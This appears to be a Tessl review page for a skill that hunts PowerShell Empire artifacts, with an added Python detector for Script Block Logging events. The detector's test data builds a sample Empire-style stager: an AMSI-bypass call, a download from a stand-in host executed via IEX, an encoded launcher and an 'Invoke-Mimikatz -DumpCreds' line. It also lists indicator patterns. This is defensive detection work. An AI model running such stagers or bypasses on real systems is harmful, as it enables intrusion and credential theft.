Detect PowerShell Empire framework artifacts in Windows event logs by identifying Base64 encoded launcher patterns, default user agents, staging URL structures, stager IOCs, and known Empire module signatures in Script Block Logging events.
61
52%
Does it follow best practices?
Impact: Pending. No eval scenarios have been run.
Risky: Do not use without reviewing.
Optimize this skill with Tessl: `npx tessl skill review --optimize ./skills/analyzing-powershell-empire-artifacts/SKILL.md`
Quality
Discovery
82%
Based on the skill's description, can an agent find and select it at the right time? Clear, specific descriptions lead to better discovery.
This is a strong, highly specific description that clearly communicates the skill's capabilities in detecting PowerShell Empire artifacts. The main weakness is the absence of an explicit 'Use when...' clause, which would help Claude know exactly when to select this skill. The technical specificity and domain focus make it very distinctive.
Suggestions
Add a 'Use when...' clause such as 'Use when analyzing Windows event logs for PowerShell Empire indicators, investigating suspicious PowerShell activity, or performing threat hunting for post-exploitation frameworks.'
| Dimension | Reasoning | Score |
|---|---|---|
| Specificity | Lists multiple specific concrete actions: detecting Base64 encoded launcher patterns, default user agents, staging URL structures, stager IOCs, and known Empire module signatures in Script Block Logging events. | 3 / 3 |
| Completeness | Clearly answers 'what does this do' with detailed capabilities, but lacks an explicit 'Use when...' clause or equivalent trigger guidance specifying when Claude should select this skill. | 2 / 3 |
| Trigger Term Quality | Excellent coverage of natural terms a security analyst would use: 'PowerShell Empire', 'Windows event logs', 'Base64 encoded', 'Script Block Logging', 'IOCs', 'stager', 'launcher patterns', 'user agents'. These are highly specific and natural keywords for this domain. | 3 / 3 |
| Distinctiveness / Conflict Risk | Extremely specific niche targeting PowerShell Empire framework detection in Windows event logs. This is unlikely to conflict with other skills due to the highly specialized domain and specific artifact types mentioned. | 3 / 3 |
| Total | | 11 / 12 Passed |
Implementation
22%
Reviews the quality of instructions and guidance provided to agents. Good implementation is clear, handles edge cases, and produces reliable results.
This skill reads more like a high-level briefing document than an actionable skill. It identifies the right detection patterns and concepts but completely lacks executable code, concrete examples, step-by-step workflows, or sample outputs. Claude would not be able to reliably perform the described analysis based solely on this content.
Suggestions
Add executable Python code for parsing EVTX files and matching the listed detection patterns (e.g., using python-evtx library to extract Event ID 4104 script blocks and regex-match against Empire indicators).
Define a clear step-by-step workflow: 1) Load/parse EVTX, 2) Extract script blocks, 3) Decode Base64 payloads, 4) Match against IOC patterns, 5) Generate JSON report — with validation at each step.
Provide a concrete example of the expected JSON output schema so Claude knows exactly what to produce.
Remove the generic 'When to Use' section and the explanation of what PowerShell Empire is — replace with actionable content like example log entries and regex patterns.
| Dimension | Reasoning | Score |
|---|---|---|
| Conciseness | The overview paragraph explains what PowerShell Empire is, which Claude already knows. The 'When to Use' section is generic boilerplate that adds little value. However, the Key Detection Patterns section is reasonably lean and informative. | 2 / 3 |
| Actionability | There is no executable code, no concrete commands, no example queries, no parsing scripts, and no detection rule examples. The skill describes what to look for but never shows how to actually do it: no Python code for parsing EVTX files, no PowerShell queries, no example log entries to match against. | 1 / 3 |
| Workflow Clarity | There is no sequenced workflow at all. The skill lists detection patterns and describes a desired output format but never defines the steps to go from raw event logs to the JSON report. No validation checkpoints or error handling are mentioned. | 1 / 3 |
| Progressive Disclosure | The content is organized into clear sections with headers, which is good. However, the Output section is vague (describes a JSON report but shows no schema or example), and there are no references to supplementary files for detailed detection rules, example logs, or MITRE mappings. | 2 / 3 |
| Total | | 6 / 12 Passed |
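A worked version of the workflow the suggestions above ask for (parse records, extract 4104 script blocks, decode Base64 payloads, match indicators, emit a JSON-ready report), added here as an example; it is not code from the reviewed skill or from Tessl. It assumes the records arrive as concatenated `<Event>` XML elements with no XML declaration, which is what python-evtx's `record.xml()` or `wevtutil qe Microsoft-Windows-PowerShell/Operational /f:xml` produce, so the standard library is enough to parse them. The indicator list is an assumption built from commonly documented Empire defaults (the `-noP -sta -w 1 -enc` launcher switches, the default profile URIs and User-Agent, the AMSI bypass call and the RC4 stager stub) and is illustrative rather than complete; the sample records are constructed, with the stager text modeled on the structure of Empire's default launcher rather than copied from it.

```python
"""Hunt Event ID 4104 (Script Block Logging) records for PowerShell Empire launcher/stager artifacts."""
import base64
import json
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Indicator set. Assumption: built from widely documented Empire defaults (launcher switches,
# default profile URIs and User-Agent, AMSI bypass, RC4 stager stub). Extend from the Empire source.
INDICATORS = {
    "launcher_switches": re.compile(r"-nop\s+-sta\s+-w\s+1\s+-enc\b", re.I),
    "default_user_agent": re.compile(
        r"Mozilla/5\.0 \(Windows NT 6\.1; WOW64; Trident/7\.0; rv:11\.0\) like Gecko"),
    "staging_uri": re.compile(r"/(?:admin/get|news|login/process)\.php"),
    "amsi_bypass": re.compile(r"System\.Management\.Automation\.AmsiUtils", re.I),
    "stager_rc4_stub": re.compile(r"\$iv\s*=\s*\$data\[0\.\.3\]", re.I),
    "empire_module": re.compile(
        r"\b(?:Invoke-Mimikatz|Invoke-PSInject|Invoke-TokenManipulation)\b", re.I),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_base64_runs(text):
    """Decode every long base64 run; -EncodedCommand payloads are UTF-16LE."""
    out = []
    for run in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(run, validate=True)
        except Exception:  # not base64 (hash, token, bad padding): skip it
            continue
        utf16 = len(raw) % 2 == 0 and raw[1:2] == b"\x00"
        out.append(raw.decode("utf-16-le" if utf16 else "utf-8", errors="replace"))
    return out


def match_indicators(text):
    """Map indicator name -> first matching snippet (truncated)."""
    return {name: rx.search(text).group(0)[:60]
            for name, rx in INDICATORS.items() if rx.search(text)}


def parse_script_blocks(xml_text):
    """Yield 4104 script blocks from concatenated <Event> elements."""
    root = ET.fromstring("<Events>" + xml_text + "</Events>")
    for ev in root.iter(NS + "Event"):
        sysel = ev.find(NS + "System")
        if sysel.findtext(NS + "EventID") != "4104":
            continue  # 4103 module logging etc. has a different payload layout
        data = {d.get("Name"): d.text or "" for d in ev.iter(NS + "Data")}
        yield {"time": sysel.find(NS + "TimeCreated").get("SystemTime"),
               "computer": sysel.findtext(NS + "Computer"),
               "script_block_id": data.get("ScriptBlockId", ""),
               "path": data.get("Path", ""), "text": data.get("ScriptBlockText", "")}


def build_report(xml_text):
    """Parse -> extract blocks -> decode base64 -> match IOCs -> JSON-ready dict."""
    findings = []
    for block in parse_script_blocks(xml_text):
        raw_hits = match_indicators(block["text"])
        dec_hits = {}
        for payload in decode_base64_runs(block["text"]):  # look inside -enc payloads too
            dec_hits.update(match_indicators(payload))
        if not raw_hits and not dec_hits:
            continue
        distinct = set(raw_hits) | set(dec_hits)
        findings.append({**{k: v for k, v in block.items() if k != "text"},
                         "indicators": raw_hits, "decoded_indicators": dec_hits,
                         "severity": "high" if len(distinct) >= 2 else "medium"})
    return {"technique": "T1059.001", "events_flagged": len(findings), "findings": findings}


def make_event(system_time, block_id, text, event_id=4104):
    """Constructed sample record in the Windows Event XML schema (not real telemetry)."""
    return (f'<Event xmlns="{NS[1:-1]}"><System><Provider Name="Microsoft-Windows-PowerShell"/>'
            f'<EventID>{event_id}</EventID><TimeCreated SystemTime="{system_time}"/>'
            '<Computer>WS01.corp.example</Computer></System><EventData>'
            f'<Data Name="ScriptBlockText">{escape(text)}</Data>'
            f'<Data Name="ScriptBlockId">{block_id}</Data><Data Name="Path"></Data>'
            '</EventData></Event>')


# Constructed stager text modeled on the structure of Empire's default launcher.
STAGER = ("[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
          ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
          "$wc=New-Object System.Net.WebClient;"
          "$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';"
          "$ser='http://192.0.2.10:8080';$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);"
          "$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];"
          "-join[Char[]](& $R $data ($IV+$K))|IEX")
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()
SAMPLE_LOG = "".join([
    make_event("2024-03-01T10:00:01Z", "b1", "powershell -noP -sta -w 1 -enc " + ENCODED),
    make_event("2024-03-01T10:00:02Z", "b2", STAGER),
    make_event("2024-03-01T10:05:00Z", "b3", "Get-Process | Where-Object {$_.CPU -gt 100}"),
    make_event("2024-03-01T10:07:00Z", "b4", "Invoke-Mimikatz -DumpCreds"),
    make_event("2024-03-01T10:08:00Z", "b5", "Invoke-Mimikatz -DumpCreds", event_id=4103),
])

if __name__ == "__main__":
    print(json.dumps(build_report(SAMPLE_LOG), indent=2))
```

Run directly, it prints the report for the embedded sample (three flagged events: the launcher command line, the stager body, and the lone module call). For a real log, build the input with `with Evtx(path) as log: xml_text = "".join(r.xml() for r in log.records())` from python-evtx and pass it to `build_report`. Two caveats a practitioner should keep in mind: 4104 records the script block as executed, so the `-enc` command line itself usually appears only when one script spawns another PowerShell process (process creation events such as 4688 or Sysmon event 1 are the better source for it), which is why the analyzer matches both raw text and decoded payloads; and long script blocks are split across several 4104 records (the `MessageNumber`/`MessageTotal` fields), which this example does not reassemble before matching.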
Validation
90%
Checks the skill against the spec for correct structure and formatting. All validation checks must pass before discovery and implementation can be scored.
Validation — 10 / 11 Passed
Validation for skill structure
| Criteria | Description | Result |
|---|---|---|
| frontmatter_unknown_keys | Unknown frontmatter key(s) found; consider removing or moving to metadata | Warning |
| Total | | 10 / 11 Passed |
888bbe4